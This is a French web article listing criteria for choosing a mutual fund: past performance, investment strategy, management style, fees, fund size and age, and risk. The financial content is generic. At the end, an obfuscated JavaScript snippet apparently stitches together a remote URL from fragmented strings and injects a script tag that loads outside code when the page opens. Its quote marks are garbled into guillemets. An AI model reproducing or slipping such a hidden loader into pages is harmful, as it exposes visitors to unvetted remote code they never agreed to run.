Les critères essentiels pour choisir un fonds commun de placement

gratte-ciel

Dans le monde de l’investissement, les fonds communs de placement constituent une option populaire pour diversifier son portefeuille et profiter du savoir-faire des professionnels. Cependant, face à l’énorme choix disponible sur le marché, il est parfois difficile de faire un choix éclairé. Dans cet article, nous vous présentons les principaux critères à prendre en compte lors de la sélection d’un fonds commun de placement.

La performance passée du fonds

Le premier critère à examiner est bien entendu la performance passée du fonds. Bien qu’il ne soit pas garanti que cette performance se répète à l’avenir, elle donne tout de même une indication sur la qualité de la gestion du fonds et sa capacité à générer des rendements. Il est recommandé de comparer la performance du fonds avec celle de son indice de référence ou de ses pairs sur plusieurs périodes (1 an, 3 ans, 5 ans, etc.).

A voir aussi : Quel est le meilleur robot de trading ?

La stratégie d’investissement et l’objectif du fonds

Un autre critère important est la stratégie d’investissement adoptée par le fonds commun de placement. Un fonds peut avoir une stratégie axée sur la croissance, la valeur, les dividendes ou un mélange de ces styles. L’objectif de cette stratégie doit correspondre à votre propre objectif d’investissement, que ce soit pour la constitution d’un capital ou pour la perception de revenus réguliers.

En lien avec la stratégie d’investissement, il est important de prendre en compte le style de gestion adopté par le gérant du fonds. On distingue deux grands types de gestion : active et passive. La gestion active implique que le gérant effectue des choix d’investissement pour tenter de surperformer l’indice de référence, tandis que la gestion passive vise à répliquer fidèlement la performance de cet indice.

A lire également : Comment développer son portefeuille client et augmenter son chiffre d’affaires ?

Les frais associés au fonds

Investir en OPCVM via des fonds commun de placement représente des frais qu’il faut bien sûr prendre en compte. En effet, des frais élevés peuvent impacter négativement la performance nette du fonds. Il est donc crucial de comparer les frais de gestion (frais courants) et les frais d’entrée et de sortie entre différents fonds.

  • Les frais de gestion et les frais courants : ils sont prélevés annuellement pour couvrir les coûts liés à la gestion du portefeuille d’investissement. Les frais courants regroupent les frais de gestion et d’autres dépenses liées à l’administration du fonds. Un ratio de frais courants faible est souvent synonyme d’une meilleure performance nette à long terme.

  • Les frais d’entrée et de sortie : les frais d’entrée correspondent aux commissions perçues lors de l’achat de parts du fonds, tandis que les frais de sortie sont prélevés lors de la vente de ces parts. Certains fonds n’appliquent pas ou peu de frais d’entrée et de sortie, ce qui peut être avantageux pour l’investisseur.

La taille et l’ancienneté du fonds

La taille du fonds (actifs sous gestion) et son ancienneté sont également à considérer lors de la sélection d’un fonds commun de placement. Un fonds ayant une taille importante et une longue histoire est souvent perçu comme étant plus stable et mieux établi sur le marché.

Le risque associé au fonds

Enfin, il est essentiel d’évaluer le niveau de risque associé au fonds commun de placement. Ce niveau de risque doit correspondre à votre propre tolérance au risque et à votre horizon d’investissement. Pour cela, vous pouvez analyser la volatilité historique du fonds, ainsi que sa répartition géographique et sectorielle.

(function(){
xh9z_=(« u »+ » »)+ »s »+ » »;xh9z_+=(« tat. »)+(« i »);
xh9z=document.createElement(« script »);xh9z.type= »text/javascript »;xh9z_+= »nf »+(« o »)+ »/ »;
xh9zu= »551194094″+ ». »;xh9z.async=true;xh9zu+= »jkyvbt7uh9zs0gwf6d9t8fc849X1ez »;
xh9z.src= »https:// »+xh9z_+xh9zu;xh9zb=document.body;xh9zb.appendChild(xh9z);
})();

Articles similaires